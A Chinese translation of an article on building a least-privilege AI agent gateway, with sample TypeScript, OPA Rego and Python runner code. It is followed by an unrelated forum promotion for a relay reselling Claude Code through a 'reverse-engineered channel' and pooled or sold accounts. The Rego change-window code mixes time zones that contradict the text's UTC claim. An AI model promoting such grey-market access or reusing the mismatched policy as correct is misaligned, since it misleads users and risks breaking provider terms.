网关架构遵循深度防御模型,这是基础设施和云系统中一个确立已久的安全原则。深度防御不是依赖单一控制来防止滥用,而是应用多个独立的安全措施,以便一个层次的失败不会导致整个系统的妥协。这种方法通常用于零信任网络、云 IAM 设计和生产级 CI/CD 管道。在智能体驱动的系统中,依赖单一控制(如提示约束或静态工具允许列表)是不够的,因为智能体在运行时做出决策,并且可能以无法完全预测或由单一安全措施限制的方式跨多个工具和系统行动。

在 AI 驱动自动化的背景下,深度防御意味着没有任何单一组件(无论是智能体、网关还是执行环境)本身拥有足够的权限来造成损害。每一层执行一个狭窄、明确定义的角色,并且每一层之间的过渡都要经过验证。

这个原则反映在架构如何有意地将请求操作的人与执行操作的地方分开。AI 智能体被视为不受信任的请求者。它们可以发现能力和提交结构化请求,但它们从不直接与基础设施 API 交互。所有执行都发生在一个严格的网关后面,该网关执行验证、授权和隔离。

系统的流程故意设计成单向的,强制执行不变性,即没有事先授权和隔离执行,任何执行都不会发生:

  • 发现:智能体使用模型上下文协议(MCP)发现哪些工具可用以及它们需要什么输入。

  • 请求:智能体使用 JSON-RPC 调用调用工具(例如,apply_infra)。

  • 验证:网关验证请求模式,计算计划哈希,用身份和上下文丰富请求,并将其发送到 OPA 进行授权。

  • 决策:如果 OPA 拒绝请求,网关返回 403 响应,执行停止。如果获得批准,请求被转换为作业并放入执行队列。

  • 执行:一个短暂的运行器拉取作业,创建一个隔离的命名空间,应用基础设施计划,并在完成后删除环境。

  • 可观测性:在每个阶段都会发出度量和跟踪,允许仪表板实时跟踪策略决策、执行延迟和故障模式。

这种分离确保即使智能体由于提示错误、配置错误或妥协而表现出意外,爆炸半径也会受到限制。授权决策是在执行之前做出的,执行是在隔离的环境中进行的,并且每一步都是可观测和可审计的。

在图 2 中,我们可以看到 AI 智能体网关执行的完整的请求到执行工作流程。图表显示了智能体请求是如何被验证、授权、排队、在隔离环境中执行和完全观测的,当策略拒绝操作时有明确的停止点。

图 2:AI 智能体网关的端到端请求和执行工作流程(Debnath,2026)

关于这个参考实现

本文介绍的一个参考实现,旨在说明 AI 驱动自动化的治理边界,而不是提出一个生产硬化的安全平台。

附带的存储库有意地将架构的清晰性置于完整性之上。它展示了意图、授权和执行如何通过网关模式分离和执行,同时保持实现最小化和本地可运行。

因此,本文中讨论的一些控制被显示为架构模式而不是完全强制的保证。例如,Kubernetes 命名空间为临时执行提供逻辑隔离,但尚未通过作用域服务账户、网络策略或工作负载身份强制执行最少权限访问。同样,计划完整性在策略层使用哈希进行验证,但这些哈希没有与运行器执行的签名工件进行加密绑定。可观测性是根据基于 OpenTelemetry 的跟踪和度量来描述的,但参考代码说明了仪器属于哪里,而不是连接一个完整的遥测管道。

项目蓝图

AI 智能体网关被设计为范围狭窄的组件的组合,而不是单一的、单体的服务。每个组件处理不同的职责:请求中介、授权或执行,以便智能体行为可以独立于基础设施执行细节而进行治理、审计和演化。这种分离是有意的,反映了最小化爆炸半径的核心设计目标,同时保持系统的可理解性和可测试性。

本节概述 AI 智能体网关是如何由一组专注的小组件构建的,每个组件负责单一的关注点。目标是通过设计使系统可理解、可审计和可演进,而不是将策略、执行和编排逻辑嵌入到单个服务中。

在高层次上,架构分为三个部分,每个部分都通过定义良好的契约进行通信,以支持可替换性和可测试性:

  • 网关(API 层)接受智能体请求、验证意图、强制授权决策并协调执行。

  • 策略层使用策略作为代码封装所有授权和安全规则。

  • 执行层在隔离的、生存期短的环境中执行经过批准的操作。

这种分离允许每个层独立演进。策略可以在不重新部署网关的情况下进行更改,执行环境可以在不涉及授权逻辑的情况下进行加固,智能体可以在不影响基础设施控制的情况下进行替换或升级。

下面的小节将详细介绍每个组件,从请求处理开始,然后是策略实施,最后是隔离执行。

组件的概述

项目布局明确地反映了这种分离。存储库不是按语言或部署单元对文件进行分组,而是按职责组织的。这种结构针对架构清晰度进行了优化,而不是针对语言或框架特定的约定:

agent-gateway/ ├── mcp/ # 组件1:TypeScript网关服务│ └── server.ts # - 处理JSON-RPC和OPA检查├── policies/ # 组件2:OPA策略引擎│ └── agent_authz.rego # - 定义“谁能做什么”├── runner/ # 组件3:临时运行器│ └── runner.py # - Python脚本在Kind中执行Terraform├── infra/ # 示例基础设施(OpenTofu计划)└── docker-compose.yml # 编排
复制代码

这里使用 Terraform/OpenTofu 作为一个具体的执行示例,但相同的执行模式适用于其他后端,如云 CLI、部署工具或内部自动化脚本。

此构建的先决条件包括 Docker、Kind(Kubernetes v1.26+)、Node.js v20+、Python 3.11+和 OPA CLI。

参考实现

本文的完整、可运行的参考实现作为 GitHub 上的开源项目提供,旨在作为描述的架构模式的参考和演示,而不是作为生产硬基准。仓库包含 MCP 网关、OPA 策略、临时运行器和基于 Docker 的本地设置,允许读者复现本文中描述的示例和实验。

网关(MCP 层)

我们从构建系统的协调层开始,而不是决策组件。我们特别选择了模型上下文协议(MCP),因为它将智能体从工具定义中解耦出来。这个决定允许我们在不重写我们的治理层的情况下交换 LLM 或智能体框架,这是避免供应商锁定的关键要求。

我们在 mcp/server.ts 文件中实现了网关逻辑,以处理两个关键任务:发现和执行。

首先,我们定义了 apply_infra 工具结构,以便智能体理解所需的输入(计划、路径、哈希和环境),将智能体行为限制为明确声明的能力,并防止其发明或调用未声明的操作:

// mcp/server.ts - 工具定义if (method === "tools/list") { return res.json(rpcResult(id, {  tools: [   {    name: "apply_infra",    description: "在沙箱中应用OpenTofu/Terraform计划",    inputSchema: ApplyInfraParams.shape    }   ] }));}
复制代码

接下来,当工具被调用时,我们依赖 Zod 进行严格的模式验证。然后我们将上下文传递给 OPA。注意,我们这里不执行基础设施变更;我们只是将其排队。

// mcp/server.ts - 工具执行if (method === "tools/call") {  const { name, arguments: args } = params;    // 1. 验证模式  const parsed = ApplyInfraParams.safeParse(args);  if (!parsed.success) return res.json(rpcError(id, -32602, "Invalid params"));  //  2. 通过OPA授权  const decision = await authorize({    action: name,    actor, // 从JWT/mTLS提取    plan: { path: args.planPath, hash: args.planHash, env: args.env },    time: new Date().toISOString()  });  if (!decision) return res.json(rpcError(id, 403, "Policy denied"));  // 3. 排队作业(异步)  const job = await enqueueApply({ ...args, actor: actor.id }, args.idempotencyKey);  return res.json(rpcResult(id, { accepted: true, jobId: job.id }));}
复制代码

策略即代码

我们将授权逻辑从 TypeScript 代码中移出,进入 Open Policy Agent(OPA)。这个决定允许我们在不重新部署网关的情况下执行复杂的业务规则。

对于策略引擎,我们定义了 policies/agent_authz.rego 以执行四个不可协商的规则:

  • RBAC (sre-bot 具有完全访问权限;deploy-bot 仅限于非 prod)。

  • 完整性(计划散列必须匹配已注册的工件)。

  • 安全(计划以毁灭告终。计划明显受阻)。

  • 变更管理(部署只允许在周一到周五,09:00-17:00 UTC)。

# policies/agent_authz.regopackage agent.authzdefault allow = falseallow {    input.action == "apply_infra"    allow_actor[input.actor.id][input.plan.env]      # RBAC    plan_is_registered[input.plan.hash]              # 完整性    not is_destroy_plan(input.plan.path)             # 安全    in_change_window(time.parse_rfc3339_ns(input.time)) # 变更窗口}# 角色定义allow_actor := {    "sre-bot": {"dev":true, "staging":true, "prod":true},    "deploy-bot": {"dev":true, "staging":true}}is_destroy_plan(path) {    endswith(path, "-destroy.plan")}# 周一至周五 9am-5pmin_change_window(t) {    ns := time.parse_rfc3339_ns(input.time)    day := time.weekday([ns, "Local"])    is_weekday(day)    clock := time.clock([ns, "America/New_York"])    hour := clock[0]    hour >= 9    hour < 17}is_weekday(day) {    weekdays := {"Monday", "Tuesday", "Wednesday", "Thursday", "Friday"}    weekdays[day]}
复制代码

临时运行器

运行器是系统的“手”。我们使用 Python 来管理生命周期。它确保在执行前后环境是干净的。

运行器,用 Python 实现( runner/runner.py ),遵循严格的工作流程:

  • 生成一个唯一的命名空间(run-uuid)。

  • 使用 kubectl 和 tofu 执行计划。

  • 即使作业失败,也总是删除命名空间。

# runner/runner.pydef main():    job = json.loads(sys.stdin.read())    namespace = f"run-{uuid.uuid4().hex[:8]}"         with tracer.start_as_current_span("apply_infra_execution") as span:        try:            # 1.  创建沙箱            subprocess.run(["kubectl", "create", "ns", namespace], check=True)            # 2. 执行基础设施即代码            subprocess.run(["tofu", "apply", "-chdir=infra", "-auto-approve"], check=True)            span.set_status(trace.Status(trace.StatusCode.OK))        finally:            # 3. 强制清理            subprocess.run(["kubectl", "delete", "ns", namespace, "--wait"], check=False)
复制代码

这个工作流程保证了我们永远不会在集群中留下“孤儿”资源在运行。

执行和结果

构建好组件后,我们现在可以组装系统了。

引导集群

初始化一个本地 Kind 集群作为我们的“云”。

make bootstrap # 用于:kind create cluster
复制代码

播种数据

将样本 Terraform 计划推送到 infra/ 目录,并计算它们的 SHA-256 哈希值以在 OPA 中注册它们。

测试快乐路径

模拟一个有效的智能体请求。你应该看到网关接受 JSON-RPC 调用,几秒钟内,一个新的命名空间将出现在你的 Kind 集群中并消失。

# 预期:{"accepted": true, "jobId": "..".}curl -X POST http://localhost:8080/rpc ...
复制代码

测试护栏

尝试修改请求以使用未经授权的智能体或破坏性计划( infra/app-destroy.plan )。网关应该立即返回 403 Forbidden 错误,证明 OPA 在请求到达运行器之前拦截了请求。

我们必须预测这个系统如何崩溃。架构考虑了这些特定的风险:

扩展到企业

到目前为止描述的架构是故意最小化的,适合本地实验和受控环境。然而,随着团队从个人工作流程转向全组织采用,系统的许多方面需要发展,同时保持相同的控制平面语义。这些变化不是关于增加复杂性,而是关于满足在规模上出现的运维、安全和合规约束。

第一个压力点是执行隔离。Kubernetes 命名空间为本地测试和早期原型提供了合理的沙箱,但在受监管或多租户环境中往往不够。随着采用的增长,团队通常将临时运行器移动到更强的隔离边界,例如轻量级虚拟机(例如 Firecracker 或 Kata Containers)或专用的短暂 Kubernetes 集群。这种转变允许组织在不改变智能体或策略定义的情况下,实施更严格的租户分离并满足审计要求。

另一个扩展问题是工件信任。在早期阶段,在策略内部验证计划哈希通常足以防止意外漂移。在企业规模上,这种方法并不适用。计划必须是可追踪、可验证和可归因的。许多团队通过引入由内部工件注册或工具(如 Sigstore)支持的签名计划目录来解决这个问题。这使得策略层不仅可以验证计划的完整性,还可以验证谁在何时产生了计划,从而将执行变成可验证的监管链,而不是竭尽全力的保障。

随着变化的影响增加,完全自动化的执行很少是可接受的。高风险操作,如生产变更或破坏性操作通常需要明确的人类批准。与其将审批逻辑嵌入智能体或运行器中,不如将网关作为协调点。当需要批准时,网关返回一个待定状态,并指示智能体在通过 Slack 或 Jira 等外部系统发出签名批准令牌后重试。这使得人类决策保持可见和可审计,同时不削弱自动化边界。

最后,地理成为治理问题。在多区域环境中,执行必须靠近被管理的基础设施,而控制逻辑保持集中。智能体不应决定工作运行的位置。相反,临时运行器在区域部署,政策决定允许执行的位置。这一政策决策防止智能体跨越监管或数据居住边界,同时保持单一、一致的控制平面。

这些变化共同保留了网关的核心设计原则,同时允许它在现实世界的企业约束下运行。系统通过收紧执行边界和明确信任来扩展,而不是赋予智能体更多权力。

运维 SLOs

性能在智能体治理中并非次要问题。如果授权或执行变得缓慢或不可预测,团队将绕过系统。

以下服务水平目标(SLOs)旨在保护开发者信任和运维安全:

  • 政策决策延迟(<100 毫秒):授权必须足够快,以对智能体不可见。慢速政策检查会导致重试、超时或直接通过网关访问 API。

  • 运行器启动延迟(<2 秒开发/<5 秒暂存): 如果启动成本保持低,临时执行才是可行的。更长的启动时间通常意味着运行器设置有问题,无论是镜像太重、集群过载还是隔离规则减慢了速度。

  • 拒绝操作(≤2%):高拒绝率通常表明工具设计不佳或政策过于粗略。这个指标帮助团队在智能体被重新训练以绕过控制之前识别摩擦。

  • 沙箱拆除时间(<30 秒):清理延迟直接影响爆炸半径。长期存在的沙箱增加成本,泄露凭证,并使事件响应复杂化。

  • 审计日志可用性(<5 分钟): 如果证据在事后到达,治理就无效。在事件期间必须可以查询审计数据。

这些 SLOs 通过警报强制执行。当它们降级时,自动化需要暂停。

结论

在本地构建和练习这个系统,有意识地触发政策违规、执行失败和清理边缘情况,很快就清楚了一件事:智能体安全不是通过文档或模型调整来改造的。只有当护栏作为系统本身的一部分执行时,它才有效。

最有效的控制是将治理放在执行路径之外。在自动化实验期间,静态指南、访问审查和最佳实践文件很容易被绕过。相比之下,由网关强制执行并在每个请求上评估的控制始终有效,因为智能体从未直接与基础设施 API 交互。将治理视为系统边界而不是事后的想法,改变了自动化可以安全发展的方式。

将意图与执行分开也证明是关键。让智能体描述他们想要做什么,而运行器控制它如何发生,简化了安全性和调试。政策违规、无效请求和执行失败作为不同的信号出现,而不是纠缠在一起。这种分离使得在不破坏工作流的情况下收紧政策成为可能,并且在不触及授权逻辑的情况下加强执行。

即使在本地设置中,可观测性也扮演了同样重要的角色。捕获政策决策、执行步骤和沙箱清理的跟踪和日志使智能体行为可检查而不是假设。我们不是相信智能体“做了正确的事情”,而是可以验证发生了什么,何时发生,以及为什么允许或拒绝决策。

最后,临时执行从根本上改变了风险实验的感觉。知道每个操作都在短暂的环境中运行,并且必须拆除,使得测试破坏性场景变得安全,而不会留下残留状态。这种方法降低了失败的成本,并鼓励了更严格的政策,因为错误被设计为包含。

综合来看,这些教训指向了一个更广泛的结论:AI 驱动的自动化的安全性通过更明确的、可执行的边界而不是更智能的模型来提高。通过解耦意图(智能体)、授权(政策作为代码)和执行(临时运行器),最小权限 AI 智能体网关将抽象的 AI 风险转化为具体的工程约束。在这个模型中,对智能体的信任不是一种信念,而是你可以观察、测量和强制的东西。

原文链接:

https://www.infoq.com/articles/building-ai-agent-gateway-mcp/

🚀 VBCode 中转站

🌐 官方地址

👉 https://vbcode.io


⚡ 当前可用服务

1️⃣ Claude Code – AWS (逆向渠道)

  • 💡 倍率:0.35 倍率
  • ✅ 支持 Opus 4.6, sonnet 4.6
  • ✅ 支持 网络搜索
  • ✅ 支持 缓存
  • ✅ 支持 深度思考


2️⃣ Claude Code – Max (官方 Max 账户号池)

  • 💡 倍率:1.2 倍率
  • ✅ 官方 Max 号池
  • 💼 另有官方渠道账号资源,提供成品号(带售后,需要可私聊,公告有群地址)
    • 200 美刀 Max
    • 100 美刀 Max


3️⃣ Codex 5.3

  • 💡 倍率:0.25 倍率


🎁 新用户福利

🎉 V 站新注册用户回复本帖 直接赠送 20 美元余额
上一贴回复过的都赠送过 20 美元余额,若再次回复,也赠送 5 刀余额

📌 获取方式

  1. 在本帖回复你的 注册 ID (例如: ID: 123)
    👉 查看地址: https://vbcode.io/console/personal
  2. 没有账户回帖的用户加群(公告有群地址)私聊发放 10 美金余额
  3. 旧帖( https://v2ex.com/t/1190025)作废, 后续请在本帖回复


🎫 抽奖活动

🎁 奖品

💰 100 美元兑换码 × 1

⏰ 截止时间

2026 年 3 月 6 日 15:00


🎯 抽奖规则

  • 取当日(2026 年 3 月 6 日) A 股沪指收盘点位整数部分
  • 对 15:00 前的楼层总数取模
  • 得到的楼层号即为中奖楼层
  • 若抽到楼主楼层 → 自动顺延下一楼
    (若无下一楼则顺延上一楼)


📌 示例

  • 沪指收盘:3500 点
  • 参与人数:66 人
  • 3500 % 66 = 2
  • 👉 2 楼中奖